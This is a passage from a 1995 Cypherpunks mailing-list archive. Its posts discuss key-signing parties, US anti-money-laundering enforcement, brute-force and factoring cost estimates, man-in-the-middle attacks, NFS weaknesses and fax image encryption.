 (The above statements are my opinions and do not necessarily represent the
  opinions of the Department of Defense, the US Navy, or the Naval Research
  Laboratory.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 10 Oct 95 15:46:31 PDT
To: jpb@miamisci.org (Joe Block)
Subject: Re: How to hold a key signing party?
In-Reply-To: <v01520c00aca09a7cd770@[199.227.2.175]>
Message-ID: <199510102246.SAA12947@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Joe Block writes:
> What I have in mind is to have everyone who is planning on attending send
> me their key and its fingerprint.  I'll collate the lot and print enough
> copies of the list of names/fingerprints so that once everyone shows up,
> each person can get a handout.  Everyone presents ID showing who they are
> and reads off their fingerprint so the attendees can check them on their
> handout.  Afterwards, I'll email all attendees the keys so they can sign
> them and mail them back to me.  Once I receive the signed keys, I'll
> redistribute them back to the owners & attendees.

What you describe is the method we use at IETF meetings (we always
have key signing parties) and it is about as efficient as you can hope
for. The one proviso I'll add is that you really don't need people to
show ID -- thats up to the people signing the keys...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santiago de la Paz <garnett@wombat.catbelly.com>
Date: Tue, 10 Oct 95 18:13:55 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
In-Reply-To: <199510101550.QAA29289@utopia.hacktic.nl>
Message-ID: <199510110113.TAA08320@wombat.catbelly.com>
MIME-Version: 1.0
Content-Type: text/plain



> Often files retrieved include e-mail thought to have been
> erased long ago. It survives because the diligent
> computer system manager makes backup tapes of everything
> on the system every night, then stores those tapes for
> years.

Uh... they back up their *mail* spools?  Yeah, right.

~james




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Tue, 10 Oct 95 18:17:12 PDT
To: Travis Corcoran <tjic@OpenMarket.com>
Subject: Re: truth in advertising: Netscape 1.1 on security
In-Reply-To: <199510101534.LAA22081@cranmore.openmarket.com>
Message-ID: <Pine.LNX.3.91.951010191532.545A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> I ran 'strings' on the binary, and only got one "about.*security" reference.
> 
> entering it as an URL
> 		
> 		about:security
> 
> yields the ironically humorous (when you consider all of the security bugs):
> 
> 		Whatchew talkin' 'bout, Willis?


this happens when anything other than what is define by the program is 
entered.  ie, about:time would give the same result.

my 'home' page is this about:mozilla.

ciao,

- -pjf


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHsbnU3Qo/lG0AH5AQHpdwQAoCoiFqVFkYO1NWbkOAj0N0R0O6j/CmjA
DbHi60cA3Sztvp4rrMVGj4L/TvGjnL5+Iru2pU5cJHwgYxngfQOCaQ59G8CmsH2k
T4pMqjB9sTqzf/mowpJDmgIIyHiap3EfwYQc7a/eH9Yp4F/oiT4hCA3I1+5Z+n7l
t3VKdnEAJ7E=
=buPy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 10 Oct 95 19:32:50 PDT
To: cypherpunks@toad.com
Subject: Int'l Money Laundering, Part the Second
Message-ID: <v02120d04aca0b23db407@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



INTERNATIONAL ASPECTS
The increasingly long arm of US law

Those of you who have read my earlier exploration on the subject
of jurisdiction (http://www.communities.com/paper/swamp.html)
should be aware of a wide variety of ways that the US can "reach
out and touch someone" they're not pleased with.

Well, last week, I learned a few more.

There are several ways in which the US is attempting to exert
hegemony throughout the world wrt banking regulation:

  o Identification of "fiscally tolerant" nations and banking
    havens, and close regulatory examination of all transactions
    with these countries.

  o Pressure on major US trading partners and allies to pass
    and implement anti-money-laundering legislation and
    regulatory regimes.

  o Regulations on foreign banks with offices in the US, making
    compliance demands on world-wide operations.

  o Criminal prosecution of banks suspected of institutional
    involvement in money laundering, even if said bank has no
    offices or branches in the US.

  o Worldwide pre-trial substitute asset forfeiture of banks
    suspected of institutional involvement in money laundering,
    even if said bank has no offices or branches in the US.


Pariah Nations in Banking
=========================

As I touched on briefly in the previous section, transactions
with well-known banking havens can automatically qualify as
"suspicious." And in addition to some of the better known havens,
a number of countries were pointed out at the conference as
being "fiscally tolerant", including Malta, Uruguay, Japan,
Ireland and Belgium; in another presentation the countries of
Eastern Europe and the former Soviet Union were identified as
"rapidly growing" sources of suspicious baning activity.

Transactions with counterparties in such countries will be flagged
by regulators for closer examination -- banks with large percentages
of transactions with these countries will be expected to meet a
higher standard in their attempt to identify "suspicious" behavior
and will be under increasing pressure to investigate their customers'
business practicies and motivation for all bank transactions.

Some countries are clearly going to continue to tell the US to
"get stuffed." However, if the US is successful in pressuring more
and more countries to "tow the line", it will leave a shrinking
pool of transactions subject to closer and closer examination.


New Money Laundering Legislation
================================

Two presentations, one from Taiwan, the other from Thailand,
focused on new or proposed legislation wrt money laundering in
those countries. Based on my direct experience of living in the
former, and my reseach into the latter, it's going to be a very,
very long time before such legislation has a significant
impact on either country.

Chinese people (who are in the majority in Taiwan, and form
an economically active minority in Thailand) are very cash-
oriented; I vividly remember payday in Taiwan, with the boss
sitting at a table piled with money, bundling up salaries for
everyone. I'd come home at the end of each month with a giant
wad of cash from my several different jobs. One could hardly
imagine a better environment for money laundering than a society
in which large quantities of cash change hands on a regular basis.
After his talk, the Taiwanese speaker acknowledged the problems,
but seemed hopeful that progress could be made.

The speaker from Thailand, Nualnoi Treerat, a professor of
Economics, discussed the proposed legislation primarily as an
attempt to reduce the impact of organized crime on
political life and society in Thailand; however, by her own
estimations, the underground economy in Thailand represents
17-19% of the country's GDP (mostly drugs and prostitution.)
Given the extensive corruption which she also detailed, it
seems that such legislation will be a very small step indeed.

Other speakers addressed the issue of cultural differences
with respect to the use of cash and attitudes towards privacy,
and it came up at lunch both days -- in many cultures, financial
privacy is held in much higher regard than in the US, and people
have a  much stronger suspicion towards the government. Furthermore,
there are many people who feel this way in the US. There is going
to be an inevitable clash between atttempts to closely regulate
and monitor money movements and people's fundamental desire for
privacy. It's not clear that people of any culture can be sufficiently
frightend by the bad guys to give up as much of their privacy as
would be required for ultimate success in the War on Money Laundering.

Despite the dim chances of success, it's clear that the US has
been at least partially successful in coercing and coaxing other
countries to adopt measures against money laundering, and to
some extent there is local support for these measures. But these
direct efforts pale by comparison to some other techniques...


Foreign Bank Regulation
=======================

In various pro-privacy publications I've read, there have been
oblique warnings about doing business with foreign banks that
maintain offices in the US. At this conference, I learned some
very concrete reasons for this.

It turns out that if a foreign bank wants to open a US office,
they must demonstrate compliance with US money laundering laws
throughout their _worldwide operations_. Furthermore, they're
expected to have solid leadership for these policies from their
home offices.

This puts such banks in a serious bind. For instance, while
Annunzio-Wylie absolves (or attempts to absolve) banks from civil
liability for filing Suspicious Activity Reports and Criminal
Referral Forms on their cusomters, this absolution does not extend
to the home countries of these banks, where substantially different
laws may obtain -- possibly explicitly forbidding this kind of
reporting.

There is almost a certain kind of logic to this kind of activity,
but not content to extend our laws over the worldwide operations
of banks with US offices, there are two ways in which US authorities
are now attempting to extend US laws to banks _with no US offices_.


Extraterritorial Reach
======================

The best paper presented at the conference, hands down, was
"Surviving the Solution: The Extraterritorial Reach of the
United States," by Kirk Munroe, a criminal defense attorney
practicing in Miami. [I intend to find out if an online
version of this paper can be made available.]

To quote Mr. Munroe:

  The US money laundering law specifically provides for
  extraterritorial jurisdiction when (a) the conduct is by a US
  citizen anywhere in the world, or, if by a non-US citizen,
  the conduct occurs, at least in part, in the United States,
  and (b) the transactions, or a series of related transactions,
  exceeds $10,000. [18 USC $ 1956(f)]

Some add'l background: banks involved in international business
typically have a number of _correspondent accounts_ scattered
around the world that are used for clearing wire transfers and
other transactions. Since the BCCI scandal, the US government
has increasingly gone after these accounts when a bank is
suspected of facilitating money laundering.

Furthermore, banks can have these correspondent accounts seized,
even if they no longer contain "dirty" money, because they
_facilitated_ a money laundering activity.

When you combine these elements, you get a strategy that
permits the US government to confiscate worldwide correspondent
accounts of banks, even if they don't have a US presence.

The first case Mr. Munroe cites is that of Banco de Occidente
(Panama), one of his clients, that was alleged to have facilitated
the laundering of the proceeds of drug transactions. The indictment
included criminal charges against the banks and a criminal
forfeiture charge. The government also filed a civil action for
the forfeiture of $412 million allegedly laundered (although it
had already passed completely through the bank.)

The government then proceded to freeze not only the bank's US
correspondent accounts, but also accounts in Germany, Switzerland
and Canada, leading to the insolvency of the bank and its subsequent
takeover by the Panamanian Banking Commission. [The Germans quickly
unfroze the account after a civil action brought by the bank.]

Quoting Munroe:

  After months of difficult and complicated negotiations which
  involved the banks' various interests in eight nations, a
  resolution was reached with the governments of the US, Canada,
  and Switzerland... [the bank] entered a guilty plea and agreed
  to forfeit, over a period of four years, $5 million to the US.
  The US, in turn, paid the Swiss and the Canadians $1 million
  each from the initial $2 million forfeiture payment.

[Those of you who are still under any delusions about the "safety"
of Swiss bank accounts, take careful note of this.]

Mr. Munroe concludes that the only reason that the bank got off
this "lightly" was because of substantial evidence that it was,
by and large, a highly respectable institution and that this
instance of laundering was an aberration.

The next case cited by Mr. Munroe is that of Bank Leu. I quote
from his paper:

  In sum, a Luxembourg bank with no office in the US was charged
  and convicted of money laundering in the US on the basis of
  clearing US dollar negotiable instruments drawn on a US bank but
  deposited by non-US citizens in Luxembourg. In other words,
  acceptance of US-dollar negotiable instruments by a bank anywhere
  in the world outside of the US renders the bank susceptible
  to US criminal jurisdiction in the money laundering field.

The case boils down to this: Bank Leu wanted to expand its private
banking business, and hired an officer to market accounts in
South America. Two related accounts were opened, and over a one-
year period $2.3 million in cashier's checks, all below $10K,
were deposited in the two accounts.

Although no guilty knowledge could be shown, this case was pursued
and won on a theory of "willful blindness", that is, the bank "should
have known" that the transactions had no valid business purpose
and were inherently suspicious (came via Columbia, were sometimes
more than 6 months old, all in small amounts, etc.). According to a
LEA representative at the conference, there was a lot of joking in
the backoffice at Bank Leu about the money being dirty, and clerks
were repeatedly told "don't worry, it's ok" by bank officers.
Certainly if this is true, it amounts to _extremely_ willful
blindness, but this case still represents an amazingly long reach
for US laws.

[more to come... "Things bad people do with money"]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 11 Oct 95 01:07:01 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Internet, the cracking machine
In-Reply-To: <9510101354.AA05988@outland>
Message-ID: <Pine.SUN.3.91.951010185952.22710A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, Mike Fletcher wrote:

> 
> Well, security bugs aside (and I've got the sun4.1.3_u1 and Win32 ns2b
> distributions :) has anyone given any thought to using Java to do some
> sort of Chinese Lottery attack.  I was re-reading App. Crypto. last
> night and it could be feasable.  If you could get your key cruncher
> thread loaded into a good many browsers to run when idle . . . .  How
> many estimated copies of NS are there?  Anyone want to do the math? :)

Ok, I'll bite.  Let's figure out how many MIPS years it takes to brute force 
various keylengths (assuming 100 instructions per key):
56: 2e3
64: 6e5
80: 4e10
128: 1e25

Andrew M. Odlyzko in his paper "The Future of Integer Factorization" 
estimates the computing power of the Internet at 3e7, and the number of
MIPS years to factor a 1024 RSA key to be 3e11.  I think both numbers are
probably off by a factor of 10 - Internet's computing power is probably
closer to 3e8 and MIPS years to factor 1024-bit key may be closer to 3e10. 

So assuming that you can get the entire Internet to help you, the amount 
of time it takes for various attacks is:

brute force keys of bit
56: 4 minutes
64: 1 day
80: 130 years
128: 3e16 years

factor RSA keys of bit
512: 20 minutes
768: 50 days
1024: 100 years
2048: 1e11 years

If you are reading this from an archive, divide the brute force numbers by
4**(your current year-1995), and the factoring numbers by 8**(your current
year-1995), for a factor of 2 improvement per year in each of the
following: average CPU power, number of computers on the Internet, and
factoring algorithm. 

(Note that the above estimates are meant to err on the low side.  I would
be VERY surprised if anyone actually manages to accomplish any of the
above attacks in the amount of time given.)

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Tue, 10 Oct 95 17:00:28 PDT
To: Ironwolf@Minotaur.com (Robert McNally)
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <v01530500ac919ccd39d8@[198.81.209.45]>
Message-ID: <m0t2oaJ-0009yvC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


I like it...

I'll point out that there's nothing wrong with having an alias, dba for
those situations where it might be advantageous.

Of course, calling it a sister org, etc. could have advantages.

Or maybe just call the ideal/culture cypherpunks and create a
slightly more structured org for span...


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Recently Peter Trei <trei@process.com> called for new names and slogans to
> replace the negatively loaded name "Cypherpunks." Here is one effort
> (partially based on his suggestion, but with refinements.) Note that I
> intend the term "strong privacy" to include both cryptography-based tools,
> and other tools such as remailers. I hereby place the following into the
> public domain.
> 
> * * *
> 
> I lock my car.
> I secure my house.
> I send my letters in envelopes.
> I store my valuables in safe places.
> I don't let strangers hold my wallet.
> I don't wear a name tag everywhere I go.
> I carry my cash and credit cards out of sight.
> I don't show off my key number when visiting the ATM.
> 
> I protect my e-mail and files with strong privacy tools.
> 
> Don't you?
> 
> 
> A message from SPAN: the Strong Privacy Advocates Network
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMGvwfwsQtf7CdTI1AQFSGwP9HWusresWaRsQig2fSNW/nXt+oKVv6Np7
> 5EuziM3v1ihP4Clr4dqUtEE+Yujf7o71I7nb1UrVvwpIOt5yWXtiZc2/5VPZFBUY
> bTUHlQ/NkgKum9RMnntb8BprtpiTSrb+o2s9iYDJLfFnCeT8n2zEn97GgandKA2o
> rbXWVIEKSpc=
> =mBAk
> -----END PGP SIGNATURE-----
> 
> -------------------------------------------------------------------------
> NOTE: Currently travelling on sabbatical. Expect responses within 7 days.
> -------------------------------------------------------------------------
>                    ROBERT McNALLY - MINOTAUR CONSULTING
>                    Ironwolf@Minotaur.com * 714/648-2248
>     Specializing in Computer Games and Digital Entertainment Software
>  Over 15 Years of Industry Experience: Creative * Technical * Managerial
> -------------------------------------------------------------------------
> 
> 
> 


-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 10 Oct 95 17:57:49 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <Pine.SUN.3.91.951009191126.845B-100000@panix.com>
Message-ID: <9510110057.AA07735@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Mon, 9 Oct 1995 19:24:06 -0400 (EDT)
    From: Duncan Frissell <frissell@panix.com>
    
    2400 Americans are imprisoned every year for federal income tax 
    violations.  Approximately one person is killed every year in arrests 
    involving federal income tax violations.

*This* is the blood of millions you spoke of?!?  Oh please . . . .

Considering that you launched into this as a comparison to the Nazi
`medical experiments' I can only conclude that you're hopelessly out
of touch with anything similar to reality.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Tue, 10 Oct 95 13:07:35 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510101920.PAA24628@panix.com>
Message-ID: <"swan.cl.cam.:012510:951010200606"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Any movement towards a third cracking session.  I know poor Netscape seems
> like old hat but it might be good to do one more to establish a working
> server (if we have one).

Indeed -- with the time to crack down to a few seconds using cryptanalytic
instead of brute, and netscape moving to 128 bit, there seemed little point in
going for netscape again.

It seems that microsoft was the one to go for, as they too use 40 bit for
each session ....  If someone can generate the CRACKing code and someone can
donate an example, I'd be DELIGHTED to arrange another BRUTE !


PS: any non US people willing to test my PGP "Multi Protocol fast lookup"
    as per http://www.pgp.net/pgp/ ? I'd like to see how fast it is from
    distant parts (at 0.3 - 0.6 s real time locally, network delays will
    be significant ...)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: userview@mindspring.com (Anne Giles)
Date: Tue, 10 Oct 95 18:21:01 PDT
To: cypherpunks@toad.com
Subject: recent crime bill
Message-ID: <199510110120.VAA06713@dylan.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm sorry about the noise but does anyone know where on the net I can find a
copy of
the recent crime bill and the anti-terrorism act.
                                                                            
            Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 10 Oct 95 21:17:46 PDT
To: tjic@OpenMarket.com
Subject: Re: truth in advertising: Netscape 1.1 on security
Message-ID: <9510110414.AA05438@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Travis Corcoran <tjic@OpenMarket.com>
> 
> I ran 'strings' on the binary, and only got one "about.*security" reference.
> 
> entering it as an URL
> 		
> 		about:security
> 
> yields the ironically humorous (when you consider all of the security bugs):
> 
> 		Whatchew talkin' 'bout, Willis?
> 

On my PC the even funnier,

		 Yeah, whatever...

results for the same URL.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 10 Oct 95 21:37:59 PDT
To: pjb@ny.ubs.com
Subject: Re: Basic Flaws in Internet Security and Commerce
Message-ID: <9510110433.AA05447@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul said:

> A fine piece of work.  The ideas expressed in this paper should scare
> the hell out of everyone who uses NFS for any serious applications,
> which for a fact includes most banks and all investment banks and
> brokage houses.  In this particular area I KNOW what is at risk.
> Again, I congratulate the authors on a first-class effort.

I agree, it's a good job of publicizing these holes, but (not to take
anything away from these guys, I'm sure they know this), these are not
newly found holes.  These attacks on NFS have been known and exploited
for years and are well known within the security community.

What if all NFS traffic was encrypted via a shared key distributed via
Diffie-Hellman?  Know that would REALLY be secure NFS;)  (I know, I know,
DH doesn't do secure authentication, so how does Alice know that she
didn't just agree to a secret with our Mr Bucket Brigade Mallet!)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 10 Oct 95 20:37:30 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Man in the Middle Revisited (but not for the last time)
In-Reply-To: <ac9ec6b5070210049d4b@[205.199.118.202]>
Message-ID: <199510110337.VAA20392@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 The entity calling itself "Timothy C. May" <tcmay@got.net> is alleged to
 have written:
>
> I don't know if "Carl Ellison the Key" is "really" the same Carl Ellison
> that Carl Ellison the Key claims to be...you see the semantic difficulties.

<snip>


Ah, but what we are concerned with is whether "Carl Ellison the Key" is
*really* the same "Carl Ellison the Key" that you think he is.  :-)  Or
to put it another way, that *he* thinks he is the same "C.E. the Key" 
that you think he is.


> To put it bluntly, all I really care about is _persistent_ key-holding,
> i.e., that the person who began posting with a given key is still using the
> same key. Or, rather, I don't even care if the keyholder "Pr0duct Cypher"
> is actually a person, or a Bourbaki-style committee--I only care that
> messages purporting to be from Pr0duct Cypher or Black Unicorn or Carl
> Ellison are still using the same key.
> 
> Who any of these entities "really" are is irrelevant to me. (I don't even
> know if Hal Finney, who I met once a few years ago, is the "real" Hal
> Finney, nor do I really care.)


Well and good, Tim, but you *do* care if the entity calling itself "Hal
Finney" is being surrounded by the Man in the Channel ("Mitch") and all 
of your communications with that entity are under Mitch's control.  For
example, you may choose to enter a contract with the entity calling
itself "Hal Finney", and provide some sort of consulting service to it
in exchange for 10,000 cyberbucks.  If Mitch is actually in control
then he could easily steal both the output of your consultation *and* 
Hal's 10,000 cyberbucks and leave the two of you hating each other.


Perhaps by "persistent key-holding" you mean to imply "without being
spoofed by Mitch", in which case I'm sure that you agree on the
importance of anti-Mitch measures.  :-)


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMHs70fWZSllhfG25AQECWwQAnk/HRTk/h0tCT80AriH28yLlCQiciGmV
T1LShDolvEGEgHThm7tG4LGRVoVUyn7h4MbmJMCXsOV7i0RlvMTA4yVZW9KIiN4O
lSzWIQSdIYLS2SQ93cmDART6kV0BBC50FeAAfEBy9PNPaX7ifjmpB0QFzjeLxTG5
TXglWqP9ijo=
=K9/N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 10 Oct 95 23:59:21 PDT
To: cypherpunks@toad.com
Subject: MITM garbage
Message-ID: <199510110408.WAA00256@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Scott Brickner writes:

>By "successful" I mean communicating without the MITM *interfering*.
>Either the parties need to exchange a symmetric key without the MITM
>eavesdropping, or exchange asymmetric keys without the MITM modifying
>them.

First of all, I think this "you can't prove there's no MITM, so might as
well not use crypto at all" stuff that some people believe is garbage. 
Once you've successfully gotten your key out, Mitch can't expect to mount
an effective MITM attack "against" you. [isolating someone else from you
is a different story] In fact, Mitch can't really MITM anyone who has any
kind of cryptocontact with the general public. Obtaining a single
non-mitch public key cuts the attack down the middle. Being able to get
your key out without it being intercepted also foils the attack, since one
there is suspicion of a MITM attack, people are going to investigate. You
can't erase crypographic evidence of MITM activity, either. So, once your
keys are actually "out there", you can no longer be effectively attacked
without leaving messy trails here or there. 

The other problem, of course, is how do you know you haven't already been
MITM'd. You don't. You can't, unless you expose it by publishing your key
to someone though a channel that can't be D.O.S.'d. Publishing a hash/sig of
future posts is not terribly practical, because not only does the hash/sig
have to be expected beforehand but what the hash is for has to be known as
well. If I publish a detached signature of something (could be my key, or
might not be) then Mitch will just have to make something up, make a sig
for it, and publish THAT. 

Posting the source code to RC5, for example, after sending out a hash
first means that Mitch will have to send out whatever it was he hashed in
place of my hash, and then make HIS hash of RC5 code, then quickly follow
up with the actual code that I was kind enough to mail to him. And since
Medussa is by definition "in the middle" I don't ever realize that any of
that happened. I suppose the "overloading the processors" works well if
you can be sure you've overloaded it, which means not only that you know
already what Mitch's power is, but you know of someone else (a group
perhaps) that has even MORE power, such that Mitch will stick out in the
timing. 

So, if you ask me, none of _those_ methods are very trustworthy considering
the resources you have to have already assigned to Mitch - after all, 
keeping a 24 hour Medussawatch on you and your whole ISP is tough work. 
Going _through_ Mitch is not easy.

>The chance of failure is minimized by diversity in the channels used to
>try to bypass the MITM. 

I agree-On the other hand, it's not terribly difficult to go _around_
Mitch.  I mean, just how many of the following things has Mitch done:
Watch all the ISP's in town and all the phone lines you can use to call
them.  Filter your work/school ISPs. Filter all your net-using neighbors,
co-workers, and friends' accounts. etc. All it takes is to get one
non-Mitch public key. 

Of course, once the MITM gig is up, the option of locking you in a room 
since 1983 will make Mitch the "new you", meaning there is no longer a 
middle. (Fortunately, though, Bob was MITM'ing Mitch at the same time,
and now you're both out of the loop and Bob has the goods now, cuz what's 
Mitch gonna do about it?)

>you can't afford a failure, you *do* need a channel over which you have
>nearly complete control.  The simplest such channel is a physical
>meeting, during which you exchange public keys.  If the MITM threat is

How do you know you're not giving your key to Mitch. And how do you know
that Mitch isn't headed over to Alice's later on to pretend to be you and 
give Alice "your" key?

Don "Medussa for short"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMHtC+sLa+QKZS485AQEEmwL+NbEoXoeJPEBKGFev8gLWBCIoniyXS4o5
YyyGnkfTjsc/DimbU15z++d/fcihUzwK/dLKBXub3fdxcna9m9YyLNEdo8QyhPNb
/Wp6PKq9SdfMb6uCzgoVwg7PrtTZzZEe
=jN+h
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Tue, 10 Oct 95 19:20:26 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: Netscape & Fortessa
In-Reply-To: <Pine.3.89.9510110202.A28210-0100000@unicorn.com>
Message-ID: <9510110220.AA02365@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> On Wed, 11 Oct 1995 02:45:16 +0100 (BST), "Rev. Mark Grant" <mark@unicorn.com> said:

>So on those grounds, the only real danger would be for the government to 
>start selling Clipper cards for $ 5 apiece. Of course, I wouldn't put it 
>past them....

>	Mark

Fortezza cards are $70.  Is that close enough?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 10 Oct 95 19:27:00 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Graphic encryption
In-Reply-To: <199510110207.WAA07713@ask.cs.cornell.edu>
Message-ID: <199510110226.WAA12742@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Allow me to add some more partially informed speculation about unreleased
source code to the pile:

Bill Stewart writes:
> The description of Privasoft's method on their web page sounded like* it
> broke up a fax image into little squares and shuffled them around based on
> some proprietary (hence presumably weak) algorithm, somewhat like feeding
> them to a shredder or puzzle-box, then put them in a file you can ship
> with regular fax software or decrypt yourself.  If that's the case,
> and if the squares are sufficiently big to have enough pixels for fax
> software to compress decently, then it's weak no matter _how_ strong
> the encryption algorithm that shuffles them is, because you can piece together
> matching edges like a jigsaw puzzle, or like a bunch of Iranian students
> with American Embassy shredded documents.  

:}

[...]
> * The software was on the web page; if I'd had spare disk space that day and
> some slack time I could have downloaded the demo version and tried it,
> but this is what the description sounded like it meant.

The graphic encryption patents I found a couple of weeks ago (cited here then) 
describe a method that I don't believe would be susceptible to a "jigsaw"
attack like this. The patented method specifies encrypting the image bitmap
bit-by-bit (it suggests XORing with a (P)RNG stream). So the square
granularity would fail your second criterion for the applicability of a jigsaw
attack. 

However, I only have circumstantial evidence to suggest that the PrivaSoft 
software actually uses the patents I've seen.

Perhaps PrivaSoft Inc. could comment on which patent(s) (if they have already 
issued) form the basis for the use of encryption in their product ?

One last note: I would certainly have a hard time applying a jigsaw attack to
the sample ciphertext image at http://www.privasoft.com/images.html (and
enlarged at http://www.privasoft.com/scramima.html). Maybe it would be easier
if the plaintext image consisted of a picture with more macroscopic structure.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 10 Oct 95 20:03:59 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: spam detector algorithm?
In-Reply-To: <199510110244.WAA07789@ask.cs.cornell.edu>
Message-ID: <199510110303.XAA12811@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles writes:
> I've been mulling over algorithmic/computational ways to spot spams
> for some time now. I think I might've come up with a way to represent
> messages (and compare representations) that would be useful to remailer
> operators who don't want to let spams (where "spam" == many messages with
> identical or very similar content) through their remailers. 
[many details elided...]
> Any thoughts about this? Interesting? Stupid? Like I said, my math is weak. 
> My intention is to try to cobble up a 2d version of this to see how it runs
> but I thought I'd see if anyone can point out why it can't work, or if it's
> useful enough that someone with a better math background than I've got 
> wants to take this idea somewhere better. 

It sounds like you are liable to start reinventing parts of the field of
information retrieval. The automatic construction and comparison of vectors
of document parameters, as you suggested in the part I omitted, is one 
approach that has met with some success. (The common problem is, given a set
of query attributes or a model document, to find relevant documents matching
the query or similar to the model document. A variety of relevance measures
has been considered.)

